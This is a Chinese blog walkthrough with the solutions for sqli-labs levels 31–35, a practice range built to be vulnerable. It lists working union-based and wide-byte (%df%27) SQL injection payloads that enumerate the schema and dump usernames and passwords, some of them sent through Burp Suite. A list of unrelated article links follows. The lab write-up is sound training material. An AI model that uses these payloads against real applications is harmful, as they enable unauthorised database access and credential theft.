sqli-labs靶场通关攻略(31-35关)

embedded/2024/10/19 14:37:13/

第31关( ") 闭合)

数据库

?id=") union select 1,2,database() --+

查表

?id=") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

查列

?id=") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

查数据

?id= ") union select 1,2,group_concat(username,0x7e,password) from users --+

第32关(宽字节注入)

数据库

?id=-1%df%27%20union%20select%201,database(),3%20--+

查表

?id=-1%df%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+

查列

?id=-1%df%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=0x7573657273--+

查数据

?id=-1%df%27%20union%20select%201,group_concat(password,username),3%20from%20users--+

第33关(宽字节注入)

数据库

?id=-1%df%27%20union%20select%201,database(),3%20--+

查表

?id=-1%df%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+

查列

?id=-1%df%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=0x7573657273--+

查数据

?id=-1%df%27%20union%20select%201,group_concat(password,username),3%20from%20users--+

第34关( post 宽字节)

本关使用addslashes函数对于账户和密码都进行转义

使用Burpsuite抓包,在登录的时候抓,然后发送到repeater

数据库

%df' union select 1,database()#

查表

%df' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

查列

%df' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273#

查数据

%df%27 union select 1,group_concat(password,username) from users#

第35关(数字闭合直接注入)

数据库

?id=-1 union select 1,2,database()#

查表

?id=-1 union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=database()#

查列

?id=-1 union select 1,2,group_concat(column_name)from information_schema.columns where table_schema=database() and table_name=0x7573657273#

查数据

?id=-1 union select 1,2,group_concat(username,password)from users #


http://www.ppmy.cn/embedded/101447.html

相关文章

linux常见基础命令

linux常见基础命令

Linux基础命令 (下面这些命令都是最常见的命令.更复杂的会在之后的C语言学习陆续深入) 1、 pwd 功能: print work directory的缩写,显示当前目录的绝对路径 2、 cd 功能: change directory的缩写,切换目录 绝对路径:以…
阅读更多...
springboot后端开发-自定义参数校验器

springboot后端开发-自定义参数校验器

背景 在使用springboot进行后端开发的时候,经常会遇到数据校验的问题, 有时候可能默认的校验器不足以满足自己的需求, 这个时候就需要开发一个自己的校验器 在 Spring Boot 中自定义参数校验器通常涉及以下几个步骤: 1. 定义注解…
阅读更多...
使用命令模式实现撤销与重做功能的完整指南

使用命令模式实现撤销与重做功能的完整指南

使用命令模式实现撤销与重做功能的完整指南 命令模式是一种行为型设计模式,它将请求封装成对象,以便于对请求进行参数化、排队和记录。命令模式不仅有助于实现撤销和重做功能,还能提高系统的灵活性和可维护性。在本文中,我们将详…
阅读更多...
【JUC并发编程系列】深入理解Java并发机制:CAS算法与原子类在Java中的实践应用(二、CAS)

【JUC并发编程系列】深入理解Java并发机制:CAS算法与原子类在Java中的实践应用(二、CAS)

文章目录 【JUC并发编程系列】深入理解Java并发机制:CAS算法与原子类在Java中的实践应用(二、CAS)1. 同步之原子类(Atomic类)2. 使用atomicInteger计数3. 使用atomicInteger底层原理3. compareAndSet原理分析3.1 手写AtomicInteger3.2 手写Lo…
阅读更多...
刘海屏的优雅回归?华为Mate 70 Pro定义新美学

刘海屏的优雅回归?华为Mate 70 Pro定义新美学

在智能手机的发展历程中,华为Mate系列一直是高端旗舰的代表。而今,华为Mate 70 Pro的神秘面纱终于揭开,其回归的刘海屏设计和独特的寰宇舷窗设计,再次将华为的设计理念推向了新的高度。 刘海屏的回归:经典与创新的融合…
阅读更多...
Pytorch实现CIFAR10训练模型

Pytorch实现CIFAR10训练模型

文章目录 简述模型结构模型参数、优化器、损失函数参数初始化优化器损失函数 模型训练、测试集预测、模型保存、日志记录训练测试集测试模型保存模型训练完整代码 tensorboard训练可视化结果train_loss测试准确率测试集loss 模型应用模型独立应用代码api.py预测结果 简述 使用…
阅读更多...
5步掌握Python Django+Vue二手房项目,实现房价预测与知识图谱系统

5步掌握Python Django+Vue二手房项目,实现房价预测与知识图谱系统

🍊作者:计算机毕设匠心工作室 🍊简介:毕业后就一直专业从事计算机软件程序开发,至今也有8年工作经验。擅长Java、Python、微信小程序、安卓、大数据、PHP、.NET|C#、Golang等。 擅长:按照需求定制化开发项目…
阅读更多...
每日OJ_牛客_剪花布条(string内置函数)

每日OJ_牛客_剪花布条(string内置函数)

目录 牛客_剪花布条(string内置函数) 解析代码 牛客_剪花布条(string内置函数) 剪花布条__牛客网 解析代码 题意就是在S串中,T串整体出现了多少次。C语言可以通过strstr函数找,用STL的string库可以通过f…
阅读更多...
最新文章

Copyright @ 2022~2023